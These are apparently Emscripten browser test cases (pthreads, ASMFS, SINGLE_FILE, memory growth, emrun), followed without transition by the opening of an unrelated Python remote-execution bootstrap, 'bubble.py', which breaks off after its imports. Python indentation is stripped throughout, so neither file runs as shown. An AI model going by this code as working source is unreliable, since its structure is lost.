self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs/hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest_exit('cstdio/test_remove.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest_exit('dirent/test_readdir.c', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest_exit('dirent/test_readdir_empty.c', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd/close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd/access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd/unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest_exit('fcntl/test_fcntl_open.c', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest_exit('minimal_hello.c', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-s', 'FORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-s', 'USE_PTHREADS', '-s', 'EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-gsource-map', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_system(self):
self.btest_exit(test_file('system.c'))
@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
# Tests that Emscripten-compiled applications can be run when a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
bubble.py
|
from __future__ import print_function
import sys
sys.path = [p for p in sys.path if p.startswith('/')]
__name__ = '__bubble__'
sys.modules[__name__] = sys.modules.pop('__main__')
def debug(msg):
print(msg, file=sys.stderr)
# Reshuffle fds so that we can't break our transport by printing to stdout
import os
# inpipe is defined in the bootstrap command line code in tunnel.py
outfd = os.dup(1)
outpipe = os.fdopen(outfd, 'wb', 0)
sys.stdin.close()
sys.stdin = open(os.devnull, 'r')
sys.stdout.close()
sys.stdout = open(os.devnull, 'w')
PY2 = sys.version_info < (3,)
PY3 = not PY2
import threading
if PY2:
__metaclass__ = type
from Queue import Queue
import cPickle as pickle
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
range = xrange
else:
from queue import Queue
import pickle
exec_ = getattr(__builtins__, 'exec')
from imp import is_builtin
import time
import struct
import imp
from collections import namedtuple
